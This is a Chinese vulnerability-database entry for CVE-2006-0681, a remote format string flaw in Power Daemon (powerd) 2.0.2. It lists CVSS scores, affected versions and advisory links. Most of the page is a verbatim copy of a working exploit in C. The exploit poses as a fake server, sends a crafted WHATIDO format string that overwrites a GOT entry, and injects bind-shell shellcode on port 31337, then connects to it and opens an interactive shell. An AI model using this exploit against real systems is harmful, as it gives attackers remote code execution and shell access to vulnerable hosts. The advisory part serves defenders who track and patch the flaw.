CVE-2006-0681
CVSS7.5
发布时间 :2006-02-14 19:02:00
修订时间 :2011-03-07 21:30:35
NMCOE    

[原文]Format string vulnerability in powerd.c in Power Daemon (powerd) 2.0.2 and earlier allows remote attackers to execute arbitrary code via format string specifiers in the WHATIDO variable.


[CNNVD]PowerD远程格式化字符串漏洞(CNNVD-200602-193)

        Power Daemon (powerd) 2.0.2及之前版本的powerd.c中存在格式化字符串漏洞。远程攻击者可以借助WHATIDO变量中的格式化字符串限定符执行任意代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:power_daemon:power_daemon:2.0.1.1
cpe:/a:power_daemon:power_daemon:2.0.1
cpe:/a:power_daemon:power_daemon:2.0.0
cpe:/a:power_daemon:power_daemon:2.0.2
cpe:/a:power_daemon:power_daemon:2.0.0.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0681
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-0681
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200602-193
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/0545
(UNKNOWN)  VUPEN  ADV-2006-0545
http://secunia.com/advisories/18841
(VENDOR_ADVISORY)  SECUNIA  18841
http://gotfault.net/research/advisory/gadv-powerd.txt
(UNKNOWN)  MISC  http://gotfault.net/research/advisory/gadv-powerd.txt
http://xforce.iss.net/xforce/xfdb/24713
(UNKNOWN)  XF  powerdaemon-syslog-format-string(24713)
http://www.securityfocus.com/bid/16582
(UNKNOWN)  BID  16582

- 漏洞信息

PowerD远程格式化字符串漏洞
高危 格式化字符串
2006-02-14 00:00:00 2006-02-17 00:00:00
远程  
        Power Daemon (powerd) 2.0.2及之前版本的powerd.c中存在格式化字符串漏洞。远程攻击者可以借助WHATIDO变量中的格式化字符串限定符执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本。

- 漏洞信息 (1486)

Power Daemon <= 2.0.2 (WHATIDO) Remote Format String Exploit (EDBID:1486)
linux remote
2006-02-10 Verified
532 Gotfault Security
N/A [点击下载]
/*
 * gexp-powerd.c
 *
 * Power Daemon v2.0.2 Remote Format String Exploit
 * Copyright (C) 2005 Gotfault Security
 *
 * Bug found and developed by: barros and xgc
 *
 * Original Reference:
 * http://gotfault.net/research/exploit/gexp-powerd.c
 *
 */

#include <getopt.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <netdb.h>
#include <errno.h>
#include <netinet/in.h>
#include <stdio.h>

/*==[ Prototypes ]==*/
void fatal(char *);
void Usage(char *);
void FakeServer(char *,int);
void ExecuteShell(int);
int  CreateEvilBuffer(int,int,int,int,char *);
int  ConnectToShell(char *,int);

/*==[ Defines ]==*/
#define	DEFAULT_PORT		532	// Default fake server port
#define BIND_PORT		31337	// Default port to bind
#define NOPSIZE			50	// Number of NOP
#define NOP			0x90	// NOP byte
#define PAD			""	// Format string alignment
#define PORT_OFFSET		29	// Offset to fix the shellcode
#define STDIN			0
#define STDOUT			1

/*==[ Targets ]==*/
struct
{
	char	*Name;
	int	Gotaddr;
	int	Retaddr;
	int	Pop;
}Targets[] =
	{
		"Power Daemon v2.0.2 @ Slackware 10.0",
		0x0804c180,
		0xbffff2d4,
		17,

                "Power Daemon v2.0.2 @ Debian 3.1 Linux",
                0x0804c198,
                0xbffff16c,
                27,

		// Finish
		0,
		0,
		0,
		0
	};

/*==[ Shellcode by Marco Ivaldi <raptor@0xdeadbeef.info> ]==*/
char shellcode[] =
        "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
        "\x31\xdb\xf7\xe3\xb0\x66\x53\x43\x53\x43\x53\x89\xe1\x4b\xcd\x80"
        "\x89\xc7\x52\x66\x68"
        "BP" // Port to bind
        "\x43\x66\x53\x89\xe1\xb0\x10\x50\x51\x57\x89\xe1\xb0\x66\xcd\x80"
        "\xb0\x66\xb3\x04\xcd\x80"
        "\x50\x50\x57\x89\xe1\x43\xb0\x66\xcd\x80"
        "\x89\xd9\x89\xc3\xb0\x3f\x49\xcd\x80"
        "\x41\xe2\xf8\x51\x68n/sh\x68//bi\x89\xe3\x51\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(int argc, char **argv)
{
	extern  char		*optarg;
	extern  int		optind;
		char		opt;
		char		*Host = NULL;
		int		Port = DEFAULT_PORT;
		int		BindPort = BIND_PORT;
		int		TargetNumber = -1;
		int		Sock,i;
		char		EvilBuffer[1024];
		int		BufLen;

	fprintf(stdout,"\n--=[ Power Daemon Remote Format String Exploit ]\n\n");
	
	// Process arguments
	while ( (opt = getopt(argc,argv,"t:p:r:")) != EOF)
	{
		switch(opt)
		{
			case 'r':
				BindPort = atoi(optarg);
				if(!BindPort) Usage(argv[0]);
			break;
			case 'p':
				Port = atoi(optarg);
				if(!Port) Usage(argv[0]);
			break;
			case 't':
				TargetNumber = atoi(optarg);
			break;
			default: Usage(argv[0]);
			break;
		}
	}

	// Verify target
	for(i=0;;i++)
		if(Targets[i].Name == 0) break;
	if(TargetNumber == -1) Usage(argv[0]);

	fprintf(stdout,"[*] Plataform             : %s\n",Targets[TargetNumber].Name);
        fprintf(stdout,"[*] Target GOT            : %#010x\n",Targets[TargetNumber].Gotaddr);
        fprintf(stdout,"[*] Target Retaddr        : %#010x\n",Targets[TargetNumber].Retaddr);
        fprintf(stdout,"[*] Bind to port          : %u\n",BindPort);
        fprintf(stdout,"[*] Target POP            : %d\n\n",Targets[TargetNumber].Pop);

	CreateEvilBuffer(Targets[TargetNumber].Gotaddr,Targets[TargetNumber].Retaddr,Targets[TargetNumber].Pop,BindPort,EvilBuffer);
	FakeServer(EvilBuffer, BindPort);
}

void FakeServer(char *EvilBuffer, int BindPort) {

	int sock, newsock, i, reuseaddr = 1;
	struct sockaddr_in remoteaddr;
	struct sockaddr_in localaddr;
	int addrlen = sizeof(struct sockaddr_in);
	struct hostent *he;

	localaddr.sin_family = AF_INET;
	localaddr.sin_port = htons(DEFAULT_PORT);
	localaddr.sin_addr.s_addr = INADDR_ANY;
	bzero(&(localaddr.sin_zero), 8);

	fprintf(stdout,"[*] Creating Fake Server  : ");

	if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
		perror(" socket()");
		printf("\n");
		exit(1);
	}

	if (setsockopt(sock, SOL_SOCKET, SO_REUSEADDR, &reuseaddr,
		(socklen_t)sizeof(reuseaddr)) < 0) {
		perror(" setsockopt()");
		printf("\n");
		exit(1);
	}

	if (bind(sock, (struct sockaddr *)&localaddr, sizeof(localaddr)) < 0) {
		perror(" bind()");
		printf("\n");
		exit(1);
	}

	if (listen(sock, 1) < 0) {
		perror(" listen()");
		printf("\n");
		exit(1);
	}
	
	fprintf(stdout, "done\n");

	printf("[*] Waiting Client        : ");
	fflush(stdout);

	if ((newsock = accept(sock, (struct sockaddr *)&remoteaddr, &addrlen)) < 0) {
		perror(" accept()");
		printf("\n");
		exit(1);
	}

	if (getpeername(newsock, (struct sockaddr *)&remoteaddr, &addrlen) < 0) {
		perror(" getpeername()");
		printf("\n");
		exit(1);
	}

	fprintf(stdout, "done\n");

	fprintf(stdout, "[*] Host Connected        : %s:%u\n", inet_ntoa(remoteaddr.sin_addr), ntohs(remoteaddr.sin_port));

	fprintf(stdout, "[*] Sending EvilBuffer    : ");
	if(send(newsock,EvilBuffer,strlen(EvilBuffer)+1,0) == -1) {
		fatal("send()");
	}

	fprintf(stdout, "done\n\n");

	memset(EvilBuffer, 0x00, sizeof(EvilBuffer));
	strcpy(EvilBuffer, (char *)inet_ntoa(remoteaddr.sin_addr));
	
        close(newsock);

        sleep(1);

        newsock = ConectToShell(EvilBuffer,BindPort);

        if(newsock == -1) {
                fprintf(stdout,"[*] Exploit Failed.\n\n");
                exit(0);
        }
        else {
                fprintf(stdout,"[*] Spawning Shell...\n\n");
                ExecuteShell(newsock);
                close(newsock);
        }

	fflush(stdout);
}

int CreateEvilBuffer(int GOT, int RETADDR, int POP, int BINDTOPORT, char *buffer)
{
        char            *nops = malloc(NOPSIZE+1);
        char            *ptr; 
        unsigned short  *len;
        unsigned short  *portPtr = (unsigned short *)(shellcode+PORT_OFFSET);

        // Fix shellcode
        *portPtr = htons(BINDTOPORT);

        ptr = buffer;

        // Create Nops
        bzero(nops,NOPSIZE+1);
        memset(nops,NOP,NOPSIZE);

	fprintf(stdout, "[*] Creating EvilBuffer   : ");

        // Create format string attack
        sprintf(ptr,"WHATIDO "
                PAD
                "%c%c%c%c"
                "%c%c%c%c"
                "%%.%dd"
                "%%%d$hn"
                "%%.%dd"
                "%%%d$hn"
                "%s%s",
                ((u_long)GOT),
                ((u_long)GOT >> 8),
                ((u_long)GOT >> 16),
                ((u_long)GOT >> 24),
                ((u_long)GOT+2),
                (((u_long)GOT+2) >> 8),
                (((u_long)GOT+2) >> 16),
                (((u_long)GOT+2) >> 24),
                ((RETADDR & 0x0000FFFF) - 26),
                POP,
                (((RETADDR & 0xFFFF0000)>>16) + 0x10000 - (RETADDR & 0x0000FFFF)),
                POP+1,nops,shellcode);
	fprintf(stdout, "done\n");
	fflush(stdout);

        return (strlen(ptr));
}

int ConectToShell(char *Host,int Port)
{
        struct          sockaddr_in server;
        struct          hostent *hp;
        int             s;

        server.sin_family = AF_INET;
        hp = gethostbyname(Host);
        if(!hp) return(-1);

        memcpy(&server.sin_addr,hp->h_addr,hp->h_length);
        server.sin_port = htons(Port);

        s = socket(PF_INET,SOCK_STREAM,0);
        if(connect(s,(struct sockaddr *)&server, sizeof(server)) < 0)
                return(-1);

        return(s);
}

void ExecuteShell(int Sock)
{
        char            buffer[1024 * 10];
        int             count;
        fd_set          readfs;

        write(Sock,"uname -a;id\n",12);
        while(1)
        {
                FD_ZERO(&readfs);
                FD_SET(STDIN, &readfs);
                FD_SET(Sock, &readfs);
                if(select(Sock + 1, &readfs, NULL, NULL, NULL) > 0)
                {
                        if(FD_ISSET(STDIN, &readfs))
                        {
                                if((count = read(STDIN, buffer, 1024)) <= 0)
                                {
                                        if(errno == EWOULDBLOCK || errno == EAGAIN)
                                                continue;
                                        else
                                        {
                                                close(Sock);
                                                exit(-1);
                                        }
                                }
                                write(Sock, buffer, count);
                        }
                        if(FD_ISSET(Sock, &readfs))
                        {
                                if((count = read(Sock, buffer, 1024)) <= 0)
                                {
                                        if(errno == EWOULDBLOCK || errno == EAGAIN)
                                                continue;
                                        else
                                        {
                                                close(Sock);
                                                exit(-1);
                                        }
                                }
                                write(STDOUT, buffer, count);
                        }
                }
	}
}

void fatal(char *ErrorMsg)
{
        fprintf(stderr,"ERROR - %s\n\n",ErrorMsg);
        exit(1);
}


void Usage(char *Prog)
{
        int i;
        fprintf(stderr, "Usage: %s <options>\n\n"
                        "Options:\n\n"
                        " -t target     : Select the target\n"
			" -p portnumber : Sets a new port number <default: %d>\n"
                        " -r bindport   : Sets the port to bind a shell <default: %d>\n\n"
                        "Targets:\n\n",Prog,DEFAULT_PORT,BIND_PORT);

        for(i=0;;i++)
        {
                if(Targets[i].Name != 0)
                        fprintf(stderr," [%u] %s\n",i,Targets[i].Name);
                else
                        break;
        }
        fprintf(stderr,"\n");
        exit(1);
}

// milw0rm.com [2006-02-10]
		

- 漏洞信息

23123
Power Daemon (powerd) WHATIDO syslog Format String
Local / Remote, Context Dependent Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2005-10-20 Unknow
Unknow Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站